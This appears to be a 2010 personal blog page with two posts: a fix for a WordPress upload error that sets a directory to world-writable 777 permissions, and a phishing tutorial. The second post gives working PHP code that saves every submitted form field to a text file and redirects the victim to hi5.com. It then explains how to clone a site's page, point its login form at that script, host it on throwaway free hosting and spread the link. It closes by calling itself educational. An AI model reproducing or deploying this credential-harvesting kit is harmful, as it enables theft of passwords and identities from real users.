Today when I was writing the previous post. The screen shot of the free extended task manager didn’t upload. There was an error saying “The parent directory …/wp-content/uploads/2010/01 isn’t writable.”

I opened up the file manager and navigated to the uploads directory. I have had a similar problem before. So, I made a new directory and named it 2010. The default permissions were 755. I changed it to 777 and then tried to upload again. The upload was successful. Now, there won’t be any such problems till jan 1 2011. I’ll have to repeat the process again for the new year 2011.

My web host isn’t a popular one like the Hostgator or Godaddy, so I face some problems like these often. Probably it isn’t optimized for wordpress. Hope I find a way to fix this soon. Otherwise, I’ll have to shift to a better host from may.

“Phishing is a technique used to gain personal information for purposes of identity theft”.

Phishing is the most common technique utilised by the Gray hats to steal passwords and other sensitive personal data. Its is always important to know where you are filling in your passwords. The phishing pages created look exactly like the original website in design, though hideous php scripts hiding inside.  People who know nothing about php stuff tend to get fooled. Links to such pages usually circulate around the internet through social networking sites, spams, javascripts etc.

Precautions to take inorder to avoid getting hacked.

1. Whenever you are filling in your passwords or any sensitive data, always make a rule to check the address bar. Don’t step forward if you doubt the link there in the address bar.

2. Never use any javascripts provided by a unreliable source.

3. Check your browser’s homepage regularly. Make sure it hasn’t been changed by any recently installed application or a script.

Now for the real part, how to do it? (Not for beginners) queries mail to: indigoanalysis@gmail.com

Suppose you want to create a phishing page of “www123.com”. Firstly go to the website and save its source code to HDD. now make a new php script containing the following code.

<?php
header (‘Location: http://www.hi5.com/friend/login.do ‘);
$handle = fopen(“passwords.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($handle, “rn”);
fclose($handle);

exit;

?>

now name the php file to say “phisher.php”. Go to the source you saved earlier and in the form replace the action of the form to action = “phisher.php”

Make a text file named passwords.txt

Make an account in free hosting websites( use free one because your account may get deleted for phishing activities) which support php eg: www.bravenet.com or www.t35.com

Upload the html(index.html), php and the text file with your file manager. Distribute your link to the index.html (eg: account.t35.com/index.html)

With this tutorial I aim to enighten the ignorant and try to protect their identities getting leaked to wrong hands. This tutorial isn’t intended for evil purpose. (peace)

Author: Anupum pant, MSME, Ist year MANIT BHOPAL all rights reserved.